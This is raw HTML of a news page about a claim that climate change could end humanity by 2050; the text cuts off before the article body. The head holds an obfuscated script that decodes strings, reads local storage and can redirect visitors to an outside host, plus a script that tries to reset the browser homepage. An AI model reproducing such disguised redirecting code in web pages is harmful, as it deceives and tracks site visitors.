<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Человечество может исчезнуть к 2050 году &#8212; ученые | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Человечество может исчезнуть к 2050 году &#8212; ученые "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2019/06/climate-change-1-640x426.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="640" /><meta property="og:image:height" content="426" /><meta property="og:image:alt" content="Человечество может исчезнуть к 2050 году &#8212; ученые " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}#post-4756847 > article > table > tbody > tr > td > div.swp_social_panel.swp_horizontal_panel.swp_flat_fresh.swp_default_full_color.swp_individual_full_color.swp_other_full_color.scale-100{margin-bottom:0px!important;margin-top:0px!important}table.social{width:50%!important}.swp_share_button{height:max-content!important}</style><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquerymigrate.min.js'></script><meta name="description" content="Существует большая вероятность того, что человеческая цивилизация может полностью исчезнуть к 2050 году из-за различных последствий изменения климата." /><meta property="og:description" content="Существует большая вероятность того, что человеческая цивилизация может полностью исчезнуть к 2050 году из-за различных последствий изменения климата." /><meta name="keywords" content="апокалипсис,человечество,новости общества" /><link rel="canonical" href="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye" /><meta property="og:url" content="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4759202';cpage = ''
</script><link rel="preload" as="style" disabled type="text/css" rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1" /><script type="text/javascript">!function(){var mt="",t="Tag",e="natural",vt="src",st="loader",r="arg",pt="style",gt="text",n="ready",ht=":",a="STC",yt="script",o="image",i="parent",c="append",u="By",l="?",bt="IFRAME",f="add",d="*",A="Name",wt="code",m="Listener",v="no",s="https",p="m",g="Int",h="bold",y="green",b="c",St="_",Ct="write",w="Window",S="Timeout",C="al",Et="call",E="background",M="set",O="IAAAAUEBAAAACw",k="from",Mt="FRAME",B="has",Ot="href",D="Uza",kt="Document",I="create",Bt="Node",F="Of",R="AAA",j="remove",Dt="java",N="Computed",Q="2",It="bind",T="com",Z=".",x=";",Ft="cookie",Rt="close",H="base",L="GODlh",U="query",q="Property",z="HM",G='"',J="weight",jt="substr",Nt="warn",P="Selector",Qt="floor",W="parse",X="Storage",Y="d1e",_="timeout",Tt="id",Zt="cdn",xt="location",Ht="document",K="AAAQABAAACAk",V="Height",Lt="random",Ut="type",qt="head",zt="Em",$="ttt",tt="Loaded",et="Event",rt=")",Gt="Image",Jt="loading",nt="%",Pt="&",Wt="name",at="S",Xt="length",ot="@import",it="local",ct="font",Yt=",",ut="Style",lt="Descriptor",ft="'",dt="Child",At="color",_t="get",Kt="1",Vt=" ",$t="ZZZ2m",te="data",ee="gif",re="Own",ne="debug",ae="Math",oe="Item",ie="Content",ce="link",ue="complete",le="load",fe="Attribute",de="(",Ae="=",me="AQABA",ve="Elements",se="replace",pe="DOMContent",ge="match",he="content",ye="NO",be="key",we="/",Se="f4FFv",Ce="State",Ee="R1cj",Me="Element",Oe="atob",ke="-",Be="MSStream",De="<",Ie="Object",Fe="opener",Re="R0l",je=">",Ne="disabled",Qe="console",Te="r",Ze="index",xe="QBADs",He="prototype",Le="YXJnb24",Ue="All",qe=$+$t,ze=te+ht+o+we+ee+x+H,Ge=(Yt=Yt,O+R),Je=Re+L+me,Pe=K+xe+Ae,We=C+Ee+D+z+Ae,Xe=(St=St,De+ye),Ye=at+je,_e=I+Me,Ke=_t+ve+u+t+A,Ve=c+dt,$e=he+w,tr=_t+re+q+lt,er=n+Ce,rr=f+et+m,nr=U+P+Ue,ar=j+dt,or=M+S,ir=W+g,cr=_t+N+ut,ur=Le+Ae,lr=Q+Ae+Kt,fr=nt+b,dr=At+ht+y+x+ct+ke+J+ht+h,Ar=it+X,mr=_t+oe,vr=Ze+F,sr=Y+Ae,pr=j+oe,gr=s+ht+we+we,hr=Z+T+we+l+Te+Ae,yr=(Pt=Pt,gt+ie),br=de+rt+x,wr=St+p,Sr=B+fe,Cr=ot+Vt+ft,Er=ft+x,Mr=De+pt+je,Or=we+d,kr=d+we,Br=De+we+pt+je,Dr=e+V,Ir=i+Bt,Fr=pe+tt,Rr=le+Vt+r,jr=E+Gt,Nr=G+rt,Qr=(ht=ht,Jt+Vt+k+Vt+a),Tr=a+Vt+_,Zr=v+Vt+a;!function(){var t=window,i=t[Ht],e=Mt,r=ne,n=Dt,c=n+yt,a=wt,o=zt+a,u=0,l=1,f=2,d=3,A=10,m=8*f,v=A*A,s=m*m,p=s*s,g=s*d+d*(m+l),h=qe,y=Se,b=st,w=b+Zt,S=ze+m*f*f+Yt,C=Ge,E=S+Je+C+Pe,M=t[ae][Qt],O=t[ae][Lt],k=function(t){i[Ct](t)},B=u,D=m,I=u,F=u,R=function(){},j=We;try{if(t[Fe][St+h]==y)return t[Fe][St+h]=mt,k(Xe+e+Ye),i[Rt]()}catch(t){}var N=i[_e](bt),Q=i[Ke](qt)[0],T=ot();N[Wt]=T,Q[Ve](N);var Z,x,H,L,U=T?t[T]:N[$e],q=u;try{H=U[Ht]}catch(t){return}try{Z=U[Ie][tr](U[kt][He],er)[_t][It](i),x=H[_e][It](i),L=U[Oe],j=L(j),q=!!U[Be]}catch(t){q=l}if(q)return ut(),ct();var z=new U[Gt],G=H[rr],J=(H[nr][It](i),U[Bt][He]),P=J[Ve],W=J[ar],X=(H[Ke][It](i),U[or][It](t)),Y=U[ir],_=U[cr][It](t),K=x[It](i,yt);k=H[Ct][It](i),M=U[ae][Qt],O=U[ae][Lt];var V=L(ur);H[Ft][ge](V+St+r+lr)&&(R=U[Qe][Nt][It](U[Qe],fr+o,dr)),z[vt]=E;for(var $=U[Ar]||[],tt=0;tt<$[Xt];tt++){var et=$[be](tt);if(Y(et[jt](0,d),m)+mt==et[jt](d)){var rt=$[mr](et);if(rt[Xt]<v&&rt[vr](sr)==u)return $[pr](et),t[xt]=gr+w+hr+t[xt]+Pt+rt}}var nt=ot(),at=K();function ot(){return wr+M(O()*p*p)}function it(t){dt(),B||(F=ut(l),I=ct(l),t())}function ct(t){var e=ft(ce,Ne);return e&&e[Sr](Ot)?lt(Cr+e[Ot]+Er,t):e}function ut(t){var e=ft(yt,Ut,pt);if(e)return lt(e[gt],t)}function lt(t,e){if(k(Mr+t+Or+ot()+kr+Br),e)return ft(pt)}function ft(t,e,r){for(var n=i[Ke](t),a=n[Xt];-1<--a;)if(!e||n[a][Sr](e)&&(!r||n[a][e]==r))return n[a]}function dt(){z[ue]?z[Dr]||(B=l,I&&I[Ir][ar](I),F&&F[Ir][ar](F)):D--&&X(dt,l)}function At(){if(Z()==Jt)return G[Et](i,Fr,At);R(Rr);var t,e=x(pt);e[Tt]=j,P[Et](Q,e);var r=_(e)[jr];if(r[Xt]>v){var n=K(),a=r[jt](g)[se](Nr,mt),o=ot();U[o]=P[It](Q,n),t=a[jt](m*f),W[Et](Q,e),n[yr]=L(t),U[xt]=c+ht+o+br,R(Qr)}else Z()!=ue?(R(Tr),X(At,s)):R(Zr)}t[nt]=it[It](t,At),at[yr]=nt+br,P[Et](Q,at)}()}();</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4759202&amp;a=1738" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});;};admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:3px"> <div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/news_society-ukr/full/506-lyudstvo-mozhe-zniknuti-do-2050-roku-vcheni">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>27.15</td><td>26.84</td><td>27.21</td> </tr> <tr class="tr_white"><td>EUR</td><td>30.65</td><td>30.02</td><td>30.59</td> </tr> <tr><td>RUB</td><td>0.42</td><td>0.33</td><td>0.42</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>555.16</td><td>0.18</td><td>20:36 05.06.2019</td> </tr> <tr class="tr_white"> <td>UX</td><td>1731.75</td><td>0.00</td><td>17:00 05.06.2019</td> </tr> <tr> <td>RTS</td><td>1303.35</td><td>-0.32</td><td>18:51 05.06.2019</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>60.84</td><td>-2.16</td><td style="text-transform:uppercase;">Jun</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy"> <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" />Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li id="menu-item-1" ><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li></ul></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_kiev/full/506-uzhe-cherez-cherez-polgoda-zhetonov-v-stolichnom-metro-ne-budet" title="Уже через полгода жетонов в столичном метро не будет"><img width="210" height="156" alt="Уже через полгода жетонов в столичном метро не будет" src="https://enovosty.com/wp-content/uploads/2019/06/b5888d1ccedfb18755646dc23525d835-e1559744002266.jpeg"></a><a href="https://enovosty.com/news_kiev/full/506-uzhe-cherez-cherez-polgoda-zhetonov-v-stolichnom-metro-ne-budet" title="Уже через полгода жетонов в столичном метро не будет" class="name">Уже через полгода жетонов в столичном метро не будет <span>(379)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_society/full/506-bolee-poloviny-ukraincev-podderzhivaet-novuyu-pravoslavnuyu-cerkov-ukrainy-epifanij" title="Более половины украинцев поддерживает новую Православную церковь Украины, - Епифаний"><img width="210" height="156" alt="Более половины украинцев поддерживает новую Православную церковь Украины, - Епифаний" src="https://enovosty.com/wp-content/uploads/2019/06/20181026190918-5207.jpg"></a><a href="https://enovosty.com/news_society/full/506-bolee-poloviny-ukraincev-podderzhivaet-novuyu-pravoslavnuyu-cerkov-ukrainy-epifanij" title="Более половины украинцев поддерживает новую Православную церковь Украины, - Епифаний" class="name">Более половины украинцев поддерживает новую Православную церковь Украины, - Епифаний <span>(363)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news-auto/full/506-investory-delayut-stavku-na-elektromobili-vmesto-tradicionnyx-avto-issledovanie" title="Инвесторы делают ставку на электромобили вместо традиционных авто - исследование"><img width="210" height="156" alt="Инвесторы делают ставку на электромобили вместо 